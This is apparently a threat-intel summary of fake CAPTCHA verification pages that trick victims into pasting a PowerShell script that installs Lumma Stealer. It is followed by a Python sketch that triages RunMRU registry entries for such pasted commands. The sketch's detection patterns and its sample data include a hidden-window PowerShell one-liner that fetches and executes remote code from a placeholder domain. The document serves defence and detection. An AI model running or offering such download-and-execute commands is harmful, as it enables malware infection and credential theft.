Fake human CAPTCHA-style verification pages lead to copy/paste script for Lumma Stealer

Intel Name: Fake human CAPTCHA-style verification pages lead to copy/paste script for Lumma Stealer

Date of Scan: September 2, 2024

Impact: High

Summary:
As of August 27, 2024, fake verification pages are being used to spread Lumma Stealer malware. These pages prompt victims to paste a PowerShell script into a Run window, which then downloads and executes the Lumma Stealer EXE. The malware retrieves and uses zip archives that don’t appear malicious on their own. This attack is similar to activity reported in June 2024, detailed here: [Unit42 Timely Threat Intel](https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-06-24-IOCs-for-ClickFix-pushing-Lumma-Stealer.txt).
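Commands entered in the Run window are recorded per user under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, so that key is a natural place to look for the paste step described above. The following triage sketch is an added example, not code from the original report; the heuristics, the function name `triage_runmru` and the sample values are assumptions constructed for illustration.

```python
import re

# Assumed heuristics (not from the original report): traits that are rare in a
# command typed by hand into Win+R but common in pasted download-and-run scripts.
INTERPRETER = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
SUSPICIOUS = {
    "hidden_window": re.compile(r"(?<![\w-])-w\w*\s+h\w*", re.I),
    "web_fetch": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b",
        re.I),
    "dynamic_exec": re.compile(r"\b(iex|invoke-expression|start-process)\b", re.I),
}

def triage_runmru(values):
    """Return [(value_name, command, [reasons])] for suspicious Run-dialog entries.

    `values` maps RunMRU value names ("a", "b", ..., "MRUList") to their string data,
    e.g. as exported from the registry of a host under investigation.
    """
    findings = []
    # MRUList holds the value names ordered from most to least recently used.
    order = [n for n in values.get("MRUList", "") if n in values]
    names = order or sorted(k for k in values if k != "MRUList")
    for name in names:
        command = values[name]
        if command.endswith("\\1"):          # Explorer stores entries with a "\1" suffix
            command = command[:-2]
        if not INTERPRETER.search(command):
            continue
        reasons = [label for label, rx in SUSPICIOUS.items() if rx.search(command)]
        if reasons:
            findings.append((name, command, reasons))
    return findings

# Constructed sample data; example.invalid is a reserved, non-resolving domain.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "cmd\\1",
    "b": "powershell\\1",
    "c": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify.txt)"\\1',
}

if __name__ == "__main__":
    for name, command, reasons in triage_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU value {name!r}: {', '.join(reasons)} -> {command}")
```

A hit here shows only that the command was entered in the Run window; confirm execution against process-creation and network telemetry for the same user and time window.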
